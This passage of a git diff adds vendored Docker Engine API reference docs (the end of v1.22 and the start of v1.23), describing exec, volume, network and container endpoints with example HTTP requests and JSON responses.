+      "AttachStderr": true,
+      "Cmd": ["sh"],
+      "DetachKeys": "ctrl-p,ctrl-q",
+      "Privileged": true,
+      "Tty": true,
+      "User": "123:456"
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+         "Id": "f90e34656806",
+         "Warnings":[]
+    }
+
+**JSON parameters**:
+
+-   **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command.
+-   **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command.
+-   **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command.
+-   **DetachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **Privileged** - Boolean value, runs the exec process with extended privileges.
+-   **User** - A string value specifying the user, and optionally, group to run
+        the exec process inside the container. Format is one of: `"user"`,
+        `"user:group"`, `"uid"`, or `"uid:gid"`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+-   **409** - container is paused
+-   **500** - server error
+
+#### Exec Start
+
+`POST /exec/(id)/start`
+
+Starts a previously set up `exec` instance `id`. If `detach` is true, this API
+returns after starting the `exec` command. Otherwise, this API sets up an
+interactive session with the `exec` command.
+
+**Example request**:
+
+    POST /v1.22/exec/e90e34656806/start HTTP/1.1
+    Content-Type: application/json
+
+    {
+     "Detach": false,
+     "Tty": false
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/vnd.docker.raw-stream
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**JSON parameters**:
+
+-   **Detach** - Detach from the `exec` command.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+-   **409** - container is paused
+
+**Stream details**:
+
+Similar to the stream behavior of `POST /containers/(id or name)/attach` API
+
+#### Exec Resize
+
+`POST /exec/(id)/resize`
+
+Resizes the `tty` session used by the `exec` command `id`.  The unit is number of characters.
+This API is valid only if `tty` was specified as part of creating and starting the `exec` command.
+
+**Example request**:
+
+    POST /v1.22/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1
+    Content-Type: text/plain
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: text/plain
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such exec instance
+
+#### Exec Inspect
+
+`GET /exec/(id)/json`
+
+Return low-level information about the `exec` command `id`.
+
+**Example request**:
+
+    GET /v1.22/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "CanRemove": false,
+      "ContainerID": "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126",
+      "DetachKeys": "",
+      "ExitCode": 2,
+      "ID": "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b",
+      "OpenStderr": true,
+      "OpenStdin": true,
+      "OpenStdout": true,
+      "ProcessConfig": {
+        "arguments": [
+          "-c",
+          "exit 2"
+        ],
+        "entrypoint": "sh",
+        "privileged": false,
+        "tty": true,
+        "user": "1000"
+      },
+      "Running": false
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+-   **500** - server error
+
+### 2.4 Volumes
+
+#### List volumes
+
+`GET /volumes`
+
+**Example request**:
+
+    GET /v1.22/volumes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Volumes": [
+        {
+          "Name": "tardis",
+          "Driver": "local",
+          "Mountpoint": "/var/lib/docker/volumes/tardis"
+        }
+      ],
+      "Warnings": []
+    }
+
+**Query parameters**:
+
+- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. There is one available filter: `dangling=true`
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Create a volume
+
+`POST /volumes/create`
+
+Create a volume
+
+**Example request**:
+
+    POST /v1.22/volumes/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "Name": "tardis"
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+      "Name": "tardis",
+      "Driver": "local",
+      "Mountpoint": "/var/lib/docker/volumes/tardis"
+    }
+
+**Status codes**:
+
+- **201** - no error
+- **500**  - server error
+
+**JSON parameters**:
+
+- **Name** - The new volume's name. If not specified, Docker generates a name.
+- **Driver** - Name of the volume driver to use. Defaults to `local` for the name.
+- **DriverOpts** - A mapping of driver options and values. These options are
+    passed directly to the driver and are driver specific.
+
+#### Inspect a volume
+
+`GET /volumes/(name)`
+
+Return low-level information on the volume `name`
+
+**Example request**:
+
+    GET /volumes/tardis
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Name": "tardis",
+      "Driver": "local",
+      "Mountpoint": "/var/lib/docker/volumes/tardis"
+    }
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - no such volume
+-   **500** - server error
+
+#### Remove a volume
+
+`DELETE /volumes/(name)`
+
+Instruct the driver to remove the volume (`name`).
+
+**Example request**:
+
+    DELETE /v1.22/volumes/tardis HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** - no error
+-   **404** - no such volume or volume driver
+-   **409** - volume is in use and cannot be removed
+-   **500** - server error
+
+### 2.5 Networks
+
+#### List networks
+
+`GET /networks`
+
+**Example request**:
+
+    GET /v1.22/networks?filters={"type":{"custom":true}} HTTP/1.1
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/json
+
+[
+  {
+    "Name": "bridge",
+    "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566",
+    "Scope": "local",
+    "Driver": "bridge",
+    "IPAM": {
+      "Driver": "default",
+      "Config": [
+        {
+          "Subnet": "172.17.0.0/16"
+        }
+      ]
+    },
+    "Containers": {
+      "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": {
+        "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda",
+        "MacAddress": "02:42:ac:11:00:02",
+        "IPv4Address": "172.17.0.2/16",
+        "IPv6Address": ""
+      }
+    },
+    "Options": {
+      "com.docker.network.bridge.default_bridge": "true",
+      "com.docker.network.bridge.enable_icc": "true",
+      "com.docker.network.bridge.enable_ip_masquerade": "true",
+      "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+      "com.docker.network.bridge.name": "docker0",
+      "com.docker.network.driver.mtu": "1500"
+    }
+  },
+  {
+    "Name": "none",
+    "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794",
+    "Scope": "local",
+    "Driver": "null",
+    "IPAM": {
+      "Driver": "default",
+      "Config": []
+    },
+    "Containers": {},
+    "Options": {}
+  },
+  {
+    "Name": "host",
+    "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e",
+    "Scope": "local",
+    "Driver": "host",
+    "IPAM": {
+      "Driver": "default",
+      "Config": []
+    },
+    "Containers": {},
+    "Options": {}
+  }
+]
+```
+
+**Query parameters**:
+
+- **filters** - JSON encoded network list filter. The filter value is one of:
+  -   `id=<network-id>` Matches all or part of a network id.
+  -   `name=<network-name>` Matches all or part of a network name.
+  -   `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks.
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Inspect network
+
+`GET /networks/<network-id>`
+
+**Example request**:
+
+    GET /v1.22/networks/7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99 HTTP/1.1
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/json
+
+{
+  "Name": "net01",
+  "Id": "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99",
+  "Scope": "local",
+  "Driver": "bridge",
+  "IPAM": {
+    "Driver": "default",
+    "Config": [
+      {
+        "Subnet": "172.19.0.0/16",
+        "Gateway": "172.19.0.1/16"
+      }
+    ],
+    "Options": {
+        "foo": "bar"
+    }
+  },
+  "Containers": {
+    "19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c": {
+      "Name": "test",
+      "EndpointID": "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a",
+      "MacAddress": "02:42:ac:13:00:02",
+      "IPv4Address": "172.19.0.2/16",
+      "IPv6Address": ""
+    }
+  },
+  "Options": {
+    "com.docker.network.bridge.default_bridge": "true",
+    "com.docker.network.bridge.enable_icc": "true",
+    "com.docker.network.bridge.enable_ip_masquerade": "true",
+    "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+    "com.docker.network.bridge.name": "docker0",
+    "com.docker.network.driver.mtu": "1500"
+  }
+}
+```
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - network not found
+
+#### Create a network
+
+`POST /networks/create`
+
+Create a network
+
+**Example request**:
+
+```
+POST /v1.22/networks/create HTTP/1.1
+Content-Type: application/json
+
+{
+  "Name":"isolated_nw",
+  "CheckDuplicate":true,
+  "Driver":"bridge",
+  "IPAM":{
+    "Driver": "default",
+    "Config":[
+      {
+        "Subnet":"172.20.0.0/16",
+        "IPRange":"172.20.10.0/24",
+        "Gateway":"172.20.10.11"
+      },
+      {
+        "Subnet":"2001:db8:abcd::/64",
+        "Gateway":"2001:db8:abcd::1011"
+      }
+    ],
+    "Options": {
+      "foo": "bar"
+    }
+  },
+  "Internal":true
+}
+```
+
+**Example response**:
+
+```
+HTTP/1.1 201 Created
+Content-Type: application/json
+
+{
+  "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30",
+  "Warning": ""
+}
+```
+
+**Status codes**:
+
+- **201** - no error
+- **404** - plugin not found
+- **500** - server error
+
+**JSON parameters**:
+
+- **Name** - The new network's name. this is a mandatory field
+- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`
+- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver
+- **IPAM** - Optional custom IP scheme for the network
+  - **Driver** - Name of the IPAM driver to use. Defaults to `default` driver
+  - **Config** - List of IPAM configuration options, specified as a map:
+      `{"Subnet": <CIDR>, "IPRange": <CIDR>, "Gateway": <IP address>, "AuxAddress": <device_name:IP address>}`
+  - **Options** - Driver-specific options, specified as a map: `{"option":"value" [,"option2":"value2"]}`
+- **Options** - Network specific options to be used by the drivers
+
+#### Connect a container to a network
+
+`POST /networks/(id)/connect`
+
+Connect a container to a network
+
+**Example request**:
+
+```
+POST /v1.22/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1
+Content-Type: application/json
+
+{
+  "Container":"3613f73ba0e4",
+  "EndpointConfig": {
+    "IPAMConfig": {
+        "IPv4Address":"172.24.56.89",
+        "IPv6Address":"2001:db8::5689"
+    }
+  }
+}
+```
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** - no error
+- **404** - network or container is not found
+- **500** - Internal Server Error
+
+**JSON parameters**:
+
+- **container** - container-id/name to be connected to the network
+
+#### Disconnect a container from a network
+
+`POST /networks/(id)/disconnect`
+
+Disconnect a container from a network
+
+**Example request**:
+
+```
+POST /v1.22/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1
+Content-Type: application/json
+
+{
+  "Container":"3613f73ba0e4",
+  "Force":false
+}
+```
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** - no error
+- **404** - network or container not found
+- **500** - Internal Server Error
+
+**JSON parameters**:
+
+- **Container** - container-id/name to be disconnected from a network
+- **Force** - Force the container to disconnect from a network
+
+#### Remove a network
+
+`DELETE /networks/(id)`
+
+Instruct the driver to remove the network (`id`).
+
+**Example request**:
+
+    DELETE /v1.22/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - no such network
+-   **500** - server error
+
+## 3. Going further
+
+### 3.1 Inside `docker run`
+
+As an example, the `docker run` command line makes the following API calls:
+
+- Create the container
+
+- If the status code is 404, it means the image doesn't exist:
+    - Try to pull it.
+    - Then, retry to create the container.
+
+- Start the container.
+
+- If you are not in detached mode:
+- Attach to the container, using `logs=1` (to have `stdout` and
+      `stderr` from the container's start) and `stream=1`
+
+- If in detached mode or only `stdin` is attached, display the container's id.
+
+### 3.2 Hijacking
+
+In this version of the API, `/attach`, uses hijacking to transport `stdin`,
+`stdout`, and `stderr` on the same socket.
+
+To hint potential proxies about connection hijacking, Docker client sends
+connection upgrade headers similarly to websocket.
+
+    Upgrade: tcp
+    Connection: Upgrade
+
+When Docker daemon detects the `Upgrade` header, it switches its status code
+from **200 OK** to **101 UPGRADED** and resends the same headers.
+
+
+### 3.3 CORS Requests
+
+To set cross origin requests to the Engine API please give values to
+`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all,
+default or blank means CORS disabled
+
+    $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar"
diff --git a/vendor/github.com/docker/docker/docs/api/v1.23.md b/vendor/github.com/docker/docker/docs/api/v1.23.md
new file mode 100644
index 0000000000..e23811bb95
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/api/v1.23.md
@@ -0,0 +1,3424 @@
+---
+title: "Engine API v1.23"
+description: "API Documentation for Docker"
+keywords: "API, Docker, rcli, REST, documentation"
+redirect_from:
+- /engine/reference/api/docker_remote_api_v1.23/
+- /reference/api/docker_remote_api_v1.23/
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+## 1. Brief introduction
+
+ - The daemon listens on `unix:///var/run/docker.sock` but you can
+   [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket).
+ - The API tends to be REST. However, for some complex commands, like `attach`
+   or `pull`, the HTTP connection is hijacked to transport `stdout`,
+   `stdin` and `stderr`.
+ - When the client API version is newer than the daemon's, these calls return an HTTP
+   `400 Bad Request` error message.
+
+## 2. Endpoints
+
+### 2.1 Containers
+
+#### List containers
+
+`GET /containers/json`
+
+List containers
+
+**Example request**:
+
+    GET /v1.23/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Id": "8dfafdbc3a40",
+                 "Names":["/boring_feynman"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 1",
+                 "Created": 1367854155,
+                 "State": "Exited",
+                 "Status": "Exit 0",
+                 "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}],
+                 "Labels": {
+                         "com.example.vendor": "Acme",
+                         "com.example.license": "GPL",
+                         "com.example.version": "1.0"
+                 },
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.2",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:02"
+                                  }
+                         }
+                 },
+                 "Mounts": [
+                         {
+                                  "Name": "fac362...80535",
+                                  "Source": "/data",
+                                  "Destination": "/data",
+                                  "Driver": "local",
+                                  "Mode": "ro,Z",
+                                  "RW": false,
+                                  "Propagation": ""
+                         }
+                 ]
+         },
+         {
+                 "Id": "9cd87474be90",
+                 "Names":["/coolName"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 222222",
+                 "Created": 1367854155,
+                 "State": "Exited",
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.8",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:08"
+                                  }
+                         }
+                 },
+                 "Mounts": []
+         },
+         {
+                 "Id": "3176a2479c92",
+                 "Names":["/sleepy_dog"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 3333333333333333",
+                 "Created": 1367854154,
+                 "State": "Exited",
+                 "Status": "Exit 0",
+                 "Ports":[],
+                 "Labels": {},
+                 "SizeRw":12288,
+                 "SizeRootFs":0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.6",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:06"
+                                  }
+                         }
+                 },
+                 "Mounts": []
+         },
+         {
+                 "Id": "4cb07b47f9fb",
+                 "Names":["/running_cat"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 444444444444444444444444444444444",
+                 "Created": 1367854152,
+                 "State": "Exited",
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.5",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:05"
+                                  }
+                         }
+                 },
+                 "Mounts": []
+         }
+    ]
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, Show all containers.
+        Only running containers are shown by default (i.e., this defaults to false)
+-   **limit** – Show `limit` last created
+        containers, include non-running ones.
+-   **since** – Show only containers created since Id, include
+        non-running ones.
+-   **before** – Show only containers created before Id, include
+        non-running ones.
+-   **size** – 1/True/true or 0/False/false, Show the containers
+        sizes
+-   **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters:
+  -   `exited=<int>`; -- containers with exit code of  `<int>` ;
+  -   `status=`(`created`|`restarting`|`running`|`paused`|`exited`|`dead`)
+  -   `label=key` or `label="key=value"` of a container label
+  -   `isolation=`(`default`|`process`|`hyperv`)   (Windows daemon only)
+  -   `ancestor`=(`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`)
+  -   `before`=(`<container id>` or `<container name>`)
+  -   `since`=(`<container id>` or `<container name>`)
+  -   `volume`=(`<volume name>` or `<mount point destination>`)
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **500** – server error
+
+#### Create a container
+
+`POST /containers/create`
+
+Create a container
+
+**Example request**:
+
+    POST /v1.23/containers/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+           "Hostname": "",
+           "Domainname": "",
+           "User": "",
+           "AttachStdin": false,
+           "AttachStdout": true,
+           "AttachStderr": true,
+           "Tty": false,
+           "OpenStdin": false,
+           "StdinOnce": false,
+           "Env": [
+                   "FOO=bar",
+                   "BAZ=quux"
+           ],
+           "Cmd": [
+                   "date"
+           ],
+           "Entrypoint": "",
+           "Image": "ubuntu",
+           "Labels": {
+                   "com.example.vendor": "Acme",
+                   "com.example.license": "GPL",
+                   "com.example.version": "1.0"
+           },
+           "Volumes": {
+             "/volumes/data": {}
+           },
+           "WorkingDir": "",
+           "NetworkDisabled": false,
+           "MacAddress": "12:34:56:78:9a:bc",
+           "ExposedPorts": {
+                   "22/tcp": {}
+           },
+           "StopSignal": "SIGTERM",
+           "HostConfig": {
+             "Binds": ["/tmp:/tmp"],
+             "Tmpfs": { "/run": "rw,noexec,nosuid,size=65536k" },
+             "Links": ["redis3:redis"],
+             "Memory": 0,
+             "MemorySwap": 0,
+             "MemoryReservation": 0,
+             "KernelMemory": 0,
+             "CpuShares": 512,
+             "CpuPeriod": 100000,
+             "CpuQuota": 50000,
+             "CpusetCpus": "0,1",
+             "CpusetMems": "0,1",
+             "BlkioWeight": 300,
+             "BlkioWeightDevice": [{}],
+             "BlkioDeviceReadBps": [{}],
+             "BlkioDeviceReadIOps": [{}],
+             "BlkioDeviceWriteBps": [{}],
+             "BlkioDeviceWriteIOps": [{}],
+             "MemorySwappiness": 60,
+             "OomKillDisable": false,
+             "OomScoreAdj": 500,
+             "PidMode": "",
+             "PidsLimit": -1,
+             "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] },
+             "PublishAllPorts": false,
+             "Privileged": false,
+             "ReadonlyRootfs": false,
+             "Dns": ["8.8.8.8"],
+             "DnsOptions": [""],
+             "DnsSearch": [""],
+             "ExtraHosts": null,
+             "VolumesFrom": ["parent", "other:ro"],
+             "CapAdd": ["NET_ADMIN"],
+             "CapDrop": ["MKNOD"],
+             "GroupAdd": ["newgroup"],
+             "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 },
+             "NetworkMode": "bridge",
+             "Devices": [],
+             "Ulimits": [{}],
+             "LogConfig": { "Type": "json-file", "Config": {} },
+             "SecurityOpt": [],
+             "CgroupParent": "",
+             "VolumeDriver": "",
+             "ShmSize": 67108864
+          },
+          "NetworkingConfig": {
+              "EndpointsConfig": {
+                  "isolated_nw" : {
+                      "IPAMConfig": {
+                          "IPv4Address":"172.20.30.33",
+                          "IPv6Address":"2001:db8:abcd::3033"
+                      },
+                      "Links":["container_1", "container_2"],
+                      "Aliases":["server_x", "server_y"]
+                  }
+              }
+          }
+      }
+
+**Example response**:
+
+      HTTP/1.1 201 Created
+      Content-Type: application/json
+
+      {
+           "Id":"e90e34656806",
+           "Warnings":[]
+      }
+
+**JSON parameters**:
+
+-   **Hostname** - A string value containing the hostname to use for the
+      container.
+-   **Domainname** - A string value containing the domain name to use
+      for the container.
+-   **User** - A string value specifying the user inside the container.
+-   **AttachStdin** - Boolean value, attaches to `stdin`.
+-   **AttachStdout** - Boolean value, attaches to `stdout`.
+-   **AttachStderr** - Boolean value, attaches to `stderr`.
+-   **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed.
+-   **OpenStdin** - Boolean value, opens `stdin`,
+-   **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects.
+-   **Env** - A list of environment variables in the form of `["VAR=value", ...]`
+-   **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }`
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **Entrypoint** - Set the entry point for the container as a string or an array
+      of strings.
+-   **Image** - A string specifying the image name to use for the container.
+-   **Volumes** - An object mapping mount point paths (strings) inside the
+      container to empty objects.
+-   **WorkingDir** - A string specifying the working directory for commands to
+      run in.
+-   **NetworkDisabled** - Boolean value, when true disables networking for the
+      container
+-   **ExposedPorts** - An object mapping ports to an empty object in the form of:
+      `"ExposedPorts": { "<port>/<tcp|udp>: {}" }`
+-   **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default.
+-   **HostConfig**
+    -   **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms:
+           + `host-src:container-dest` to bind-mount a host path into the
+             container. Both `host-src`, and `container-dest` must be an
+             _absolute_ path.
+           + `host-src:container-dest:ro` to make the bind-mount read-only
+             inside the container. Both `host-src`, and `container-dest` must be
+             an _absolute_ path.
+           + `volume-name:container-dest` to bind-mount a volume managed by a
+             volume driver into the container. `container-dest` must be an
+             _absolute_ path.
+           + `volume-name:container-dest:ro` to mount the volume read-only
+             inside the container.  `container-dest` must be an _absolute_ path.
+    -   **Tmpfs** – A map of container directories which should be replaced by tmpfs mounts, and their corresponding
+          mount options. A JSON object in the form `{ "/run": "rw,noexec,nosuid,size=65536k" }`.
+    -   **Links** - A list of links for the container. Each link entry should be
+          in the form of `container_name:alias`.
+    -   **Memory** - Memory limit in bytes.
+    -   **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap.
+          You must use this with `memory` and make the swap value larger than `memory`.
+    -   **MemoryReservation** - Memory soft limit in bytes.
+    -   **KernelMemory** - Kernel memory limit in bytes.
+    -   **CpuShares** - An integer value containing the container's CPU Shares
+          (ie. the relative weight vs other containers).
+    -   **CpuPeriod** - The length of a CPU period in microseconds.
+    -   **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period.
+    -   **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use.
+    -   **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
+    -   **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000.
+    -   **BlkioWeightDevice** - Block IO weight (relative device weight) in the form of:        `"BlkioWeightDevice": [{"Path": "device_path", "Weight": weight}]`
+    -   **BlkioDeviceReadBps** - Limit read rate (bytes per second) from a device in the form of:	`"BlkioDeviceReadBps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceReadBps": [{"Path": "/dev/sda", "Rate": "1024"}]"`
+    -   **BlkioDeviceWriteBps** - Limit write rate (bytes per second) to a device in the form of:	`"BlkioDeviceWriteBps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]"`
+    -   **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of:	`"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
+    -   **BlkioDeviceWiiteIOps** - Limit write rate (IO per second) to a device in the form of:	`"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
+    -   **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
+    -   **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not.
+    -   **OomScoreAdj** - An integer value containing the score given to the container in order to tune OOM killer preferences.
+    -   **PidMode** - Set the PID (Process) Namespace mode for the container;
+          `"container:<name|id>"`: joins another container's PID namespace
+          `"host"`: use the host's PID namespace inside the container
+    -   **PidsLimit** - Tune a container's pids limit. Set -1 for unlimited.
+    -   **PortBindings** - A map of exposed container ports and the host port they
+          should map to. A JSON object in the form
+          `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
+          Take note that `port` is specified as a string and not an integer value.
+    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+          exposed ports. Specified as a boolean value.
+    -   **Privileged** - Gives the container full access to the host. Specified as
+          a boolean value.
+    -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
+          Specified as a boolean value.
+    -   **Dns** - A list of DNS servers for the container to use.
+    -   **DnsOptions** - A list of DNS options
+    -   **DnsSearch** - A list of DNS search domains
+    -   **ExtraHosts** - A list of hostnames/IP mappings to add to the
